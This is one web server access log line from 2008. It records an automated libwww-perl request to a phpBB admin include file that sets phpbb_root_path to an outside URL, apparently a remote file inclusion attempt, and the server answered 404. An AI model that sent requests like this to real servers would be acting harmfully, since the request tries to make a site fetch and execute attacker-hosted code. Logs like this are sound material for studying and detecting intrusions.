65.38.190.229 - - [16/Mar/2008:06:28:41 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
